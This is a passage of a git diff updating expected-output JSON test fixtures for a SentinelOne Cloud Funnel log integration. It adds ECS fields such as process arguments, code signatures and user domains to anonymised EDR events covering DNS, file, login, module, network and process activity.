"{\"timestamp\":\"18:32:29.495\",\"src.process.parent.isStorylineRoot\":true,\"event.category\":\"dns\",\"src.process.parent.image.sha1\":\"f9bc4c756eab5121ace7ec1cf6a394be0439dec0\",\"site.id\":\"123456789123456789\",\"osSrc.process.isRedirectCmdProcessor\":false,\"src.process.image.binaryIsExecutable\":true,\"src.process.parent.displayName\":\"VIERO-RMSLaunchBar\",\"osSrc.process.image.md5\":\"f905359ab27db1dda964d77442735cb8\",\"osSrc.process.crossProcessOpenProcessCount\":0,\"osSrc.process.publisher\":\"MICROSOFTWINDOWSPUBLISHER\",\"osSrc.process.crossProcessDupThreadHandleCount\":0,\"src.process.user\":\"asdf\\\\SYSTEM\",\"osSrc.process.indicatorPersistenceCount\":0,\"src.process.parent.subsystem\":\"SYS_WIN32\",\"src.process.indicatorRansomwareCount\":0,\"src.process.crossProcessDupRemoteProcessHandleCount\":0,\"osSrc.process.crossProcessOutOfStorylineCount\":0,\"osSrc.process.image.sha1\":\"bfacfa096a56e3d149634e15e1b6470ff5a03957\",\"src.process.tgtFileCreationCount\":6,\"osSrc.process.childProcCount\":0,\"src.process.indicatorInjectionCount\":0,\"osSrc.process.indicatorReconnaissanceCount\":0,\"src.process.moduleCount\":251,\"src.process.parent.name\":\"VIERO.exe\",\"i.version\":\"preprocess-lib-1.0\",\"osSrc.process.signedStatus\":\"signed\",\"sca:atlantisIngestTime\":1664811166298,\"src.process.image.md5\":\"421f6d5ec86f6b930646321fc6ed2c46\",\"src.process.indicatorReconnaissanceCount\":0,\"src.process.storyline.id\":\"8DD23004051AA366\",\"src.process.childProcCount\":1,\"mgmt.url\":\"asdf-123.sentinelone.org\",\"src.process.crossProcessOpenProcessCount\":0,\"osSrc.process.crossProcessThreadCreateCount\":0,\"osSrc.process.moduleCount\":472,\"osSrc.process.indicatorPostExploitationCount\":0,\"osSrc.process.indicatorInfostealerCount\":0,\"src.process.subsystem\":\"SYS_WIN32\",\"meta.event.name\":\"DNS\",\"src.process.parent.integrityLevel\":\"HIGH\",\"osSrc.process.user\":\"NTAUTHORITY\\\\NETWORKSERVICE\",\"osSrc.process.image.binaryIsExecutable\":true,\"osSrc.process.tgtFileModificationCount\":0,\"src.process.indicatorExploitationCount\":0,\"osSrc.process.registryChangeCount\":0,\"src.process.parent.storyline.id\":\"8DD23004051AA366\",\"osSrc.process.netConnInCount\":0,\"i.scheme\":\"edr\",\"src.process.integrityLevel\":\"HIGH\",\"osSrc.process.indicatorInjectionCount\":0,\"osSrc.process.pid\":1340,\"site.name\":\"ASDF\",\"src.process.netConnInCount\":0,\"event.time\":1664811149495,\"account.id\":\"123456789123456789\",\"dataSource.name\":\"SentinelOne\",\"osSrc.process.crossProcessCount\":0,\"endpoint.name\":\"asdf1\",\"src.process.image.sha1\":\"d8b12c9072fdcf68ec152befb004add14b5c25b8\",\"src.process.isStorylineRoot\":false,\"src.process.parent.image.path\":\"C:\\\\Users\\\\asdf\\\\AppData\\\\Local\\\\stuff\\\\stuff\\\\Application\\\\stuff\\\\stuff.exe\",\"osSrc.process.isNative64Bit\":false,\"src.process.pid\":3924,\"osSrc.process.uid\":\"73833004051AA366\",\"tgt.file.isSigned\":\"unsigned\",\"sca:ingestTime\":1664811166,\"dataSource.category\":\"security\",\"src.process.cmdline\":\"C:\\\\ProgramFiles(x86)\\\\Microsoft\\\\important_stuff\\\\stuff.EXE\\\\\",\"src.process.crossProcessThreadCreateCount\":0,\"src.process.parent.isNative64Bit\":true,\"osSrc.process.isStorylineRoot\":true,\"src.process.parent.isRedirectCmdProcessor\":false,\"osSrc.process.integrityLevel\":\"SYSTEM\",\"src.process.signedStatus\":\"unsigned\",\"src.process.crossProcessCount\":0,\"osSrc.process.subsystem\":\"SYS_WIN32\",\"event.id\":\"01GEF7MT4CB2DBKG1NGZ8XA7E0_105\",\"osSrc.process.crossProcessDupRemoteProcessHandleCount\":0,\"osSrc.process.tgtFileCreationCount\":0,\"src.process.parent.cmdline\":\"\\\"C:\\\\Users\\\\asdf\\\\AppData\\\\Local\\\\LANInternational\\\\VIERO\\\\Application\\\\7.22.1.105\\\\VIERO.exe\\\"\",\"src.process.image.path\":\"C:\\\\Users\\\\asdf\\\\AppData\\\\Local\\\\LANInternational\\\\VIERO\\\\Application\\\\7.22.1.105\\\\CC.Falcon.OrderModule.exe\",\"src.process.tgtFileModificationCount\":4,\"osSrc.process.name\":\"svchost.exe\",\"src.process.indicatorEvasionCount\":26,\"src.process.netConnOutCount\":26,\"osSrc.process.startTime\":1664800506863,\"src.process.crossProcessDupThreadHandleCount\":0,\"endpoint.os\":\"windows\",\"osSrc.process.netConnOutCount\":53,\"osSrc.process.image.sha256\":\"e3d84df77b279ea288cc726cbf68867dc6ae00d24e0e24985141a2ee4753682a\",\"src.process.tgtFileDeletionCount\":6,\"src.process.startTime\":1664803358244,\"mgmt.id\":\"1337\",\"osSrc.process.indicatorRansomwareCount\":0,\"osSrc.process.netConnCount\":53,\"os.name\":\"Windows8.1Pro\",\"osSrc.process.indicatorGeneral.count\":7,\"src.process.displayName\":\"OrderEntryApplication(Client)\",\"osSrc.process.dnsCount\":6126,\"event.dns.request\":\"vrnorfva01.usa.ccu.clearchannel.com\",\"src.process.isNative64Bit\":true,\"src.process.parent.sessionId\":1,\"osSrc.process.sessionId\":0,\"src.process.uid\":\"AFD43004051AA366\",\"src.process.parent.image.md5\":\"1f3d8a05852ee60fb475e86a0ae74e27\",\"osSrc.process.verifiedStatus\":\"verified\",\"osSrc.process.cmdline\":\"C:\\\\WINDOWS\\\\system32\\\\svchost.exe-kNetworkService\",\"src.process.indicatorInfostealerCount\":0,\"src.process.indicatorBootConfigurationUpdateCount\":0,\"process.unique.key\":\"AFD43004051AA366\",\"src.process.parent.uid\":\"8CD23004051AA366\",\"agent.version\":\"22.1.2.217\",\"src.process.parent.image.sha256\":\"d2213413a6a558981670676ff0575e31542067ef69ee7e061c0308c4f0c0888d\",\"src.process.sessionId\":1,\"src.process.netConnCount\":26,\"mgmt.osRevision\":\"9600\",\"osSrc.process.image.path\":\"C:\\\\WINDOWS\\\\System32\\\\svchost.exe\",\"group.id\":\"asdf\",\"osSrc.process.indicatorBootConfigurationUpdateCount\":0,\"src.process.isRedirectCmdProcessor\":false,\"src.process.parent.startTime\":1664802966680,\"osSrc.process.indicatorExploitationCount\":0,\"src.process.dnsCount\":26,\"osSrc.process.tgtFileDeletionCount\":0,\"endpoint.type\":\"laptop\",\"osSrc.process.indicatorEvasionCount\":6,\"trace.id\":\"01GEF7MT4CB2DBKG1NGZ8XA7E0\",\"src.process.name\":\"CC.Falcon.OrderModule.exe\",\"agent.uuid\":\"asdf356783457dfds4456d65\",\"osSrc.process.displayName\":\"HostProcessforWindowsServices\",\"src.process.image.sha256\":\"ca261f1061485488d08e4c4618b18b42d559f4288dbad3a5c758523347ab3e7c\",\"src.process.indicatorGeneralCount\":6,\"src.process.crossProcessOutOfStorylineCount\":0,\"src.process.registryChangeCount\":0,\"packet.id\":\"1A1DF4D521014F9C90F4CF31E5446B91\",\"src.process.indicatorPersistenceCount\":0,\"src.process.parent.signedStatus\":\"unsigned\",\"src.process.parent.user\":\"asdf\\\\SYSTEM\",\"osSrc.process.storyline.id\":\"74833004051AA366\",\"event.type\":\"DNSUnresolved\",\"src.process.indicatorPostExploitationCount\":0,\"src.process.parent.pid\":2728}", "type": [ - "info" + "info", + "protocol" ] }, "group": { @@ -21,15 +30,25 @@ }, "host": { "hostname": "asdf1", + "id": "asdf356783457dfds4456d65", "os": { "name": "Windows8.1Pro", - "platform": "windows" + "platform": "windows", + "type": "windows" }, "type": "laptop" }, "process": { + "args": [ + "C:\\ProgramFiles(x86)\\Microsoft\\important_stuff\\stuff.EXE\\" + ], + "args_count": 1, + "code_signature": { + "exists": false + }, "command_line": "C:\\ProgramFiles(x86)\\Microsoft\\important_stuff\\stuff.EXE\\", "entity_id": "AFD43004051AA366", + "executable": "C:\\Users\\asdf\\AppData\\Local\\LANInternational\\VIERO\\Application\\7.22.1.105\\CC.Falcon.OrderModule.exe", "hash": { "md5": "421f6d5ec86f6b930646321fc6ed2c46", "sha1": "d8b12c9072fdcf68ec152befb004add14b5c25b8", @@ -37,8 +56,13 @@ }, "name": "CC.Falcon.OrderModule.exe", "parent": { + "args": [ + "C:\\Users\\asdf\\AppData\\Local\\LANInternational\\VIERO\\Application\\7.22.1.105\\VIERO.exe" + ], + "args_count": 1, "command_line": "C:\\Users\\asdf\\AppData\\Local\\LANInternational\\VIERO\\Application\\7.22.1.105\\VIERO.exe", "entity_id": "8CD23004051AA366", + "executable": "C:\\Users\\asdf\\AppData\\Local\\stuff\\stuff\\Application\\stuff\\stuff.exe", "hash": { "sha1": "f9bc4c756eab5121ace7ec1cf6a394be0439dec0", "sha256": "d2213413a6a558981670676ff0575e31542067ef69ee7e061c0308c4f0c0888d" @@ -292,7 +316,11 @@ "tags": [ "preserve_original_event", "preserve_duplicate_custom_fields" - ] + ], + "user": { + "domain": "asdf", + "name": "SYSTEM" + } } ] } \ No newline at end of file diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-file.log-expected.json b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-file.log-expected.json index aaddf59e971..4bcf57ed940 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-file.log-expected.json +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-file.log-expected.json @@ -6,6 +6,9 @@ "version": "8.11.0" }, "event": { + "action": [ + "creation" + ], "category": [ "file" ], @@ -18,7 +21,10 @@ }, "file": { "created": "2022-10-03T15:32:29.488Z", + "directory": "C:\\PROGRAMFILES\\MediaMonitors\\ChromeProfiles\\profile-1234\\userdata\\Default", + "drive_letter": "C", "mtime": "2022-10-03T15:32:29.488Z", + "name": "Favicons", "path": "C:\\PROGRAMFILES\\MediaMonitors\\ChromeProfiles\\profile-1234\\userdata\\Default\\Favicons", "size": 0, "type": "UNKNOWN" @@ -28,15 +34,27 @@ }, "host": { "hostname": "asdf1", + "id": "asdf356783457dfds4456d65", "os": { "name": "Windows10Pro", - "platform": "windows" + "platform": "windows", + "type": "windows" }, "type": "desktop" }, "process": { + "args": [ + "C:\\ProgramFiles(x86)\\Microsoft\\important_stuff\\stuff.EXE\\" + ], + "args_count": 1, + "code_signature": { + "exists": true, + "subject_name": "GOOGLELLC", + "trusted": true + }, "command_line": "C:\\ProgramFiles(x86)\\Microsoft\\important_stuff\\stuff.EXE\\", "entity_id": "BA34D0202623D4E6", + "executable": "C:\\ProgramFiles(x86)\\Google\\Chrome\\Application\\chrome.exe", "hash": { "md5": "32f678531906e17dd7e9508d289c8d0a", "sha1": "2797538e84a534cc5aa2d2700c0d1ca297aaa507", @@ -44,8 +62,13 @@ }, "name": "chrome.exe", "parent": { + "args": [ + "C:\\ProgramFiles\\MediaMonitors\\MediaMonitors.WebCrawler.Desktop.exe" + ], + "args_count": 1, "command_line": "C:\\ProgramFiles\\MediaMonitors\\MediaMonitors.WebCrawler.Desktop.exe", "entity_id": "3F41C4202623D4E6", + "executable": "C:\\PROGRAMFILES\\MediaMonitors\\MediaMonitors.WebCrawler.Desktop.exe", "hash": { "sha1": "cb3d662017fc8f5ca5fd8f843781dc979bc39f3a", "sha256": "bea718b473f35cfc401a8e529ec6461427ed6a2cf7dd819cb1a7895b57e3e5a7" @@ -244,7 +267,11 @@ "tags": [ "preserve_original_event", "preserve_duplicate_custom_fields" - ] + ], + "user": { + "domain": "asdf", + "name": "SYSTEM" + } } ] } \ No newline at end of file diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-indicator.log-expected.json b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-indicator.log-expected.json index 061a5cda919..22cff0e1bbe 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-indicator.log-expected.json +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-indicator.log-expected.json @@ -15,15 +15,27 @@ }, "host": { "hostname": "asdf1", + "id": "asdf356783457dfds4456d65", "os": { "name": "Windows10Pro", - "platform": "windows" + "platform": "windows", + "type": "windows" }, "type": "desktop" }, "process": { + "args": [ + "C:\\ProgramFiles(x86)\\Microsoft\\important_stuff\\stuff.EXE\\" + ], + "args_count": 1, + "code_signature": { + "exists": true, + "subject_name": "MICROSOFTWINDOWS", + "trusted": true + }, "command_line": "C:\\ProgramFiles(x86)\\Microsoft\\important_stuff\\stuff.EXE\\", "entity_id": "9544B91D29223D1A", + "executable": "C:\\Windows\\System32\\asdf\\WmiApSrv.exe", "hash": { "md5": "72260ce9438a7a9a8a5ba101eda4d6bd", "sha1": "090436b0679559cb2d5e863ad9c9135613f38d77", @@ -31,8 +43,13 @@ }, "name": "WmiApSrv.exe", "parent": { + "args": [ + "C:\\WINDOWS\\system32\\services.exe" + ], + "args_count": 1, "command_line": "C:\\WINDOWS\\system32\\services.exe", "entity_id": "B4C1F07EC98B907A", + "executable": "C:\\Windows\\System32\\services.exe", "hash": { "sha1": "86662690d627002d7cab3285f7be3e6d87b35cfb", "sha256": "9090e0e44e14709fb09b23b98572e0e61c810189e2de8f7156021bc81c3b1bb6" @@ -227,7 +244,11 @@ "tags": [ "preserve_original_event", "preserve_duplicate_custom_fields" - ] + ], + "user": { + "domain": "NTAUTHORITY", + "name": "SYSTEM" + } } ] } \ No newline at end of file diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-login.log-expected.json b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-login.log-expected.json index 20f8bc1b055..3dcbc972b9f 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-login.log-expected.json +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-login.log-expected.json @@ -13,14 +13,16 @@ "kind": "event", "original": "{\"timestamp\":\"18:32:29.467\",\"event.category\":\"logins\",\"site.id\":\"123456789123456789\",\"src.process.user\":\"NTAUTHORITY\\\\SYSTEM\",\"src.process.indicatorRansomwareCount\":0,\"src.process.crossProcessDupRemoteProcessHandleCount\":0,\"src.process.tgtFileCreationCount\":23,\"src.process.indicatorInjectionCount\":0,\"src.process.moduleCount\":180,\"i.version\":\"preprocess-lib-1.0\",\"sca:atlantisIngestTime\":1664811157561,\"src.process.indicatorReconnaissanceCount\":0,\"src.process.childProcCount\":0,\"mgmt.url\":\"asdf-123.sentinelone.org\",\"src.process.crossProcessOpenProcessCount\":20668,\"src.process.subsystem\":\"SYS_WIN32\",\"meta.event.name\":\"WINLOGONATTEMPT\",\"event.login.type\":\"NETWORK\",\"src.process.indicatorExploitationCount\":0,\"event.login.loginIsSuccessful\":true,\"src.process.integrityLevel\":\"SYSTEM\",\"i.scheme\":\"edr\",\"site.name\":\"ASDF\",\"src.process.netConnInCount\":0,\"event.time\":1664811149467,\"account.id\":\"123456789123456789\",\"dataSource.name\":\"SentinelOne\",\"endpoint.name\":\"asdf1\",\"src.process.isStorylineRoot\":false,\"src.process.pid\":776,\"sca:ingestTime\":1664811157,\"dataSource.category\":\"security\",\"src.process.crossProcessThreadCreateCount\":0,\"src.process.crossProcessCount\":20668,\"event.id\":\"01GEF7MHHR6BB9SJNBMVFMQP5X_431\",\"event.login.accountName\":\"-\",\"src.process.tgtFileModificationCount\":159,\"src.process.indicatorEvasionCount\":0,\"src.process.netConnOutCount\":24905,\"src.process.crossProcessDupThreadHandleCount\":0,\"endpoint.os\":\"windows\",\"src.process.tgtFileDeletionCount\":23,\"src.process.startTime\":1664084384297,\"mgmt.id\":\"1337\",\"os.name\":\"WindowsServer2016Datacenter\",\"src.process.isNative64Bit\":false,\"src.process.uid\":\"61D19661DB864A92\",\"event.login.sessionId\":0,\"src.process.indicatorBootConfigurationUpdateCount\":0,\"src.process.indicatorInfostealerCount\":0,\"process.unique.key\":\"61D19661DB864A92\",\"event.login.isAdministratorEquivalent\":true,\"agent.version\":\"22.1.2.217\",\"event.login.userName\":\"asdf\",\"src.process.sessionId\":-1,\"src.process.netConnCount\":24905,\"mgmt.osRevision\":\"14393\",\"src.process.isRedirectCmdProcessor\":false,\"src.process.dnsCount\":27,\"event.login.accountDomain\":\"-\",\"endpoint.type\":\"server\",\"trace.id\":\"01GEF7MHHR6BB9SJNBMVFMQP5X\",\"agent.uuid\":\"asdf356783457dfds4456d65\",\"src.process.indicatorGeneralCount\":0,\"src.process.crossProcessOutOfStorylineCount\":20554,\"src.process.registryChangeCount\":7137,\"packet.id\":\"62A299E57FC84504A7CB0A3EB733C82A\",\"src.process.indicatorPersistenceCount\":0,\"event.type\":\"Login\",\"src.process.indicatorPostExploitationCount\":0,\"event.login.accountSid\":\"S-1-0-0\"}", "type": [ - "info" + "start" ] }, "host": { "hostname": "asdf1", + "id": "asdf356783457dfds4456d65", "os": { "name": "WindowsServer2016Datacenter", - "platform": "windows" + "platform": "windows", + "type": "windows" }, "type": "server" }, @@ -156,6 +158,7 @@ "preserve_duplicate_custom_fields" ], "user": { + "domain": "NTAUTHORITY", "name": "asdf" } } diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-module.log-expected.json b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-module.log-expected.json index 2ed926f636b..be042779d73 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-module.log-expected.json +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-module.log-expected.json @@ -15,15 +15,27 @@ }, "host": { "hostname": "asdf1", + "id": "asdf356783457dfds4456d65", "os": { "name": "Windows10Pro", - "platform": "windows" + "platform": "windows", + "type": "windows" }, "type": "desktop" }, "process": { + "args": [ + "\\??\\C:\\WINDOWS\\system32\\conhost.exe0xffffffff-ForceV1" + ], + "args_count": 1, + "code_signature": { + "exists": true, + "subject_name": "MICROSOFTWINDOWS", + "trusted": true + }, "command_line": "\\??\\C:\\WINDOWS\\system32\\conhost.exe0xffffffff-ForceV1", "entity_id": "08693A26E6783D52", + "executable": "C:\\Windows\\System32\\conhost.exe", "hash": { "md5": "0d698af330fd17bee3bf90011d49251d", "sha1": "52a7274a0b4f9493632060fe25993a2ef24fe827", @@ -31,8 +43,13 @@ }, "name": "conhost.exe", "parent": { + "args": [ + "C:\\ProgramFiles\\SentinelOne\\SentinelAgent22.1.4.10010\\ranger\\SentinelRanger.exe{\"agentVersion\":\"22.1.4.10010\",\"authToken\":\"jhdskdhkdgdgdahdksaHDKJsdhkNjUifQ.+dVxpFE/Hqs5RGjPczU8DC9i1tw\",\"dataFolder\":\"C:\\\\\\\\ProgramData\\\\\\\\Sentinel\\\\\\\\ranger\",\"logsFolder\":\"C:\\\\\\\\ProgramData\\\\\\\\Sentinel\\\\\\\\logs\",\"maxIdleTime\":300,\"sendUnsuccessful\":false,\"url\":\"wss://asdf-123.sentinelone.org\",\"uuid\":\"asdf1234\"}" + ], + "args_count": 1, "command_line": "C:\\ProgramFiles\\SentinelOne\\SentinelAgent22.1.4.10010\\ranger\\SentinelRanger.exe\"\"{\\\"agentVersion\\\":\\\"22.1.4.10010\\\",\\\"authToken\\\":\\\"jhdskdhkdgdgdahdksaHDKJsdhkNjUifQ.+dVxpFE/Hqs5RGjPczU8DC9i1tw\\\",\\\"dataFolder\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\Sentinel\\\\\\\\ranger\\\",\\\"logsFolder\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\Sentinel\\\\\\\\logs\\\",\\\"maxIdleTime\\\":300,\\\"sendUnsuccessful\\\":false,\\\"url\\\":\\\"wss://asdf-123.sentinelone.org\\\",\\\"uuid\\\":\\\"asdf1234\\\"}", "entity_id": "07693A26E6783D52", + "executable": "C:\\ProgramFiles\\SentinelOne\\SentinelAgent22.1.4.10010\\Ranger\\SentinelRanger.exe", "hash": { "sha1": "a5032d5e80fc742245cb58546c4476e18747f4a0", "sha256": "3b509cfd164bdfe4e330c039745051b8057cc05b8974b1c87e7db7e1fc3eb659" @@ -223,7 +240,11 @@ "tags": [ "preserve_original_event", "preserve_duplicate_custom_fields" - ] + ], + "user": { + "domain": "NTAUTHORITY", + "name": "SYSTEM" + } } ] } \ No newline at end of file diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-network-action.log-expected.json b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-network-action.log-expected.json index fb0652b3b6f..d6febab0717 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-network-action.log-expected.json +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-network-action.log-expected.json @@ -3,6 +3,7 @@ { "@timestamp": "2022-10-03T15:32:29.466Z", "destination": { + "address": "81.2.69.192", "ip": "81.2.69.192", "port": 443 }, @@ -18,7 +19,8 @@ "original": "{\"timestamp\":\"18:32:29.466\",\"src.process.parent.isStorylineRoot\":true,\"event.category\":\"ip\",\"src.process.parent.image.sha1\":\"9037711d20353f0adec0c4558a77f6277dab778b\",\"site.id\":\"123456789123456789\",\"src.process.image.binaryIsExecutable\":true,\"src.process.parent.displayName\":\"GoogleChrome\",\"src.process.user\":\"asdf\\\\SYSTEM\",\"src.process.parent.subsystem\":\"SYS_WIN32\",\"src.process.indicatorRansomwareCount\":0,\"src.process.crossProcessDupRemoteProcessHandleCount\":0,\"src.process.activeContent.signedStatus\":\"unsigned\",\"src.process.tgtFileCreationCount\":18,\"src.process.indicatorInjectionCount\":0,\"src.process.moduleCount\":88,\"src.process.parent.name\":\"chrome.exe\",\"i.version\":\"preprocess-lib-1.0\",\"src.process.activeContentType\":\"FILE\",\"sca:atlantisIngestTime\":1664811151704,\"src.process.image.md5\":\"b0bd1ff76f58006d879fee68a1241528\",\"src.process.indicatorReconnaissanceCount\":0,\"src.process.storyline.id\":\"738A830FDFF04CF5\",\"src.process.childProcCount\":0,\"mgmt.url\":\"asdf-123.sentinelone.org\",\"src.process.crossProcessOpenProcessCount\":0,\"src.process.subsystem\":\"SYS_WIN32\",\"meta.event.name\":\"TCPV4\",\"src.process.parent.integrityLevel\":\"MEDIUM\",\"src.port.number\":56473,\"event.network.protocolName\":\"https\",\"src.process.indicatorExploitationCount\":1,\"src.process.parent.storyline.id\":\"738A830FDFF04CF5\",\"i.scheme\":\"edr\",\"src.process.integrityLevel\":\"MEDIUM\",\"site.name\":\"ASDF\",\"src.process.netConnInCount\":0,\"event.time\":1664811149466,\"account.id\":\"123456789123456789\",\"dataSource.name\":\"SentinelOne\",\"endpoint.name\":\"asdf1\",\"src.process.image.sha1\":\"9037711d20353f0adec0c4558a77f6277dab778b\",\"src.process.isStorylineRoot\":false,\"src.process.parent.image.path\":\"C:\\\\PROGRAMFILES(X86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\"dst.port.number\":443,\"src.process.pid\":12952,\"tgt.file.isSigned\":\"signed\",\"sca:ingestTime\":1664811152,\"dataSource.category\":\"security\",\"src.process.cmdline\":\"C:\\\\ProgramFiles(x86)\\\\Microsoft\\\\important_stuff\\\\stuff.EXE\\\\\",\"src.process.publisher\":\"GOOGLELLC\",\"src.process.parent.activeContentType\":\"FILE\",\"src.process.crossProcessThreadCreateCount\":0,\"src.process.parent.isNative64Bit\":false,\"src.process.parent.isRedirectCmdProcessor\":false,\"src.process.signedStatus\":\"signed\",\"src.process.crossProcessCount\":0,\"event.id\":\"01GEF7MB0DMJQHCWR3DZWQY4CF_942\",\"src.process.parent.cmdline\":\"\\\"C:\\\\ProgramFiles(x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\"\",\"src.process.image.path\":\"C:\\\\PROGRAMFILES(X86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\"src.process.tgtFileModificationCount\":35,\"src.process.indicatorEvasionCount\":1,\"src.process.netConnOutCount\":38,\"event.network.direction\":\"OUTGOING\",\"src.process.crossProcessDupThreadHandleCount\":0,\"endpoint.os\":\"windows\",\"src.process.tgtFileDeletionCount\":17,\"src.ip.address\":\"81.2.69.192\",\"src.process.startTime\":1664811134954,\"mgmt.id\":\"1337\",\"os.name\":\"Windows10Enterprise\",\"src.process.displayName\":\"GoogleChrome\",\"src.process.isNative64Bit\":false,\"src.process.parent.sessionId\":1,\"src.process.uid\":\"778A830FDFF04CF5\",\"src.process.parent.image.md5\":\"b0bd1ff76f58006d879fee68a1241528\",\"event.network.connectionStatus\":\"SUCCESS\",\"src.process.indicatorInfostealerCount\":0,\"src.process.indicatorBootConfigurationUpdateCount\":0,\"process.unique.key\":\"778A830FDFF04CF5\",\"agent.version\":\"22.1.2.217\",\"src.process.parent.uid\":\"728A830FDFF04CF5\",\"src.process.parent.image.sha256\":\"03155d327c65a8768c571018132e17336fa38349eb0c96e9cbbf5ea905ed750e\",\"src.process.sessionId\":1,\"src.process.netConnCount\":38,\"mgmt.osRevision\":\"19042\",\"dst.ip.address\":\"81.2.69.192\",\"group.id\":\"asdf\",\"src.process.isRedirectCmdProcessor\":false,\"src.process.verifiedStatus\":\"verified\",\"src.process.parent.publisher\":\"GOOGLELLC\",\"src.process.parent.startTime\":1664811134640,\"src.process.dnsCount\":39,\"endpoint.type\":\"laptop\",\"trace.id\":\"01GEF7MB0DMJQHCWR3DZWQY4CF\",\"src.process.name\":\"chrome.exe\",\"agent.uuid\":\"asdf356783457dfds4456d65\",\"src.process.image.sha256\":\"03155d327c65a8768c571018132e17336fa38349eb0c96e9cbbf5ea905ed750e\",\"src.process.indicatorGeneralCount\":15,\"src.process.crossProcessOutOfStorylineCount\":0,\"src.process.registryChangeCount\":0,\"packet.id\":\"6D359D9ED19C4CB29CC1F1D60B8E556B\",\"src.process.indicatorPersistenceCount\":0,\"src.process.parent.signedStatus\":\"signed\",\"src.process.parent.user\":\"asdf\\\\SYSTEM\",\"event.type\":\"IPConnect\",\"event.repetitionCount\":2,\"src.process.indicatorPostExploitationCount\":0,\"src.process.parent.activeContent.signedStatus\":\"unsigned\",\"src.process.parent.pid\":11892}", "outcome": "success", "type": [ - "info" + "start", + "connection" ] }, "group": { @@ -26,9 +28,11 @@ }, "host": { "hostname": "asdf1", + "id": "asdf356783457dfds4456d65", "os": { "name": "Windows10Enterprise", - "platform": "windows" + "platform": "windows", + "type": "windows" }, "type": "laptop" }, @@ -37,8 +41,18 @@ "protocol": "https" }, "process": { + "args": [ + "C:\\ProgramFiles(x86)\\Microsoft\\important_stuff\\stuff.EXE\\" + ], + "args_count": 1, + "code_signature": { + "exists": true, + "subject_name": "GOOGLELLC", + "trusted": true + }, "command_line": "C:\\ProgramFiles(x86)\\Microsoft\\important_stuff\\stuff.EXE\\", "entity_id": "778A830FDFF04CF5", + "executable": "C:\\PROGRAMFILES(X86)\\Google\\Chrome\\Application\\chrome.exe", "hash": { "md5": "b0bd1ff76f58006d879fee68a1241528", "sha1": "9037711d20353f0adec0c4558a77f6277dab778b", @@ -46,8 +60,13 @@ }, "name": "chrome.exe", "parent": { + "args": [ + "C:\\ProgramFiles(x86)\\Google\\Chrome\\Application\\chrome.exe" + ], + "args_count": 1, "command_line": "C:\\ProgramFiles(x86)\\Google\\Chrome\\Application\\chrome.exe", "entity_id": "728A830FDFF04CF5", + "executable": "C:\\PROGRAMFILES(X86)\\Google\\Chrome\\Application\\chrome.exe", "hash": { "sha1": "9037711d20353f0adec0c4558a77f6277dab778b", "sha256": "03155d327c65a8768c571018132e17336fa38349eb0c96e9cbbf5ea905ed750e" @@ -257,7 +276,11 @@ "tags": [ "preserve_original_event", "preserve_duplicate_custom_fields" - ] + ], + "user": { + "domain": "asdf", + "name": "SYSTEM" + } } ] } \ No newline at end of file diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-process.log-expected.json b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-process.log-expected.json index bca6f4f0255..d9931ba018a 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-process.log-expected.json +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-process.log-expected.json @@ -6,6 +6,9 @@ "version": "8.11.0" }, "event": { + "action": [ + "start" + ], "category": [ "process" ], @@ -13,7 +16,7 @@ "kind": "event", "original": "{\"timestamp\":\"18:32:29.470\",\"tgt.process.displayName\":\"nr-winpkg.exe\",\"src.process.parent.isStorylineRoot\":false,\"event.category\":\"process\",\"src.process.parent.image.sha1\":\"9ef7039dadb490762d4446892b1c0323f06bd1c2\",\"site.id\":\"123456789123456789\",\"src.process.parent.displayName\":\"Test123\",\"src.process.image.binaryIsExecutable\":true,\"tgt.process.storyline.id\":\"F8C44B7A0C80D2E7\",\"tgt.process.isNative64Bit\":false,\"src.process.parent.subsystem\":\"SYS_WIN32\",\"src.process.user\":\"NTAUTHORITY\\\\SYSTEM\",\"src.process.indicatorRansomwareCount\":0,\"src.process.crossProcessDupRemoteProcessHandleCount\":0,\"src.process.tgtFileCreationCount\":5621,\"src.process.indicatorInjectionCount\":0,\"src.process.moduleCount\":216402,\"src.process.parent.name\":\"newrelic-infra-service.exe\",\"i.version\":\"preprocess-lib-1.0\",\"sca:atlantisIngestTime\":1664811195133,\"src.process.image.md5\":\"7c99f420f8985a4ccf428f9fe2b090f0\",\"src.process.indicatorReconnaissanceCount\":4179,\"src.process.storyline.id\":\"F8C44B7A0C80D2E7\",\"src.process.childProcCount\":67359,\"mgmt.url\":\"asdf-123.sentinelone.org\",\"tgt.process.subsystem\":\"SYS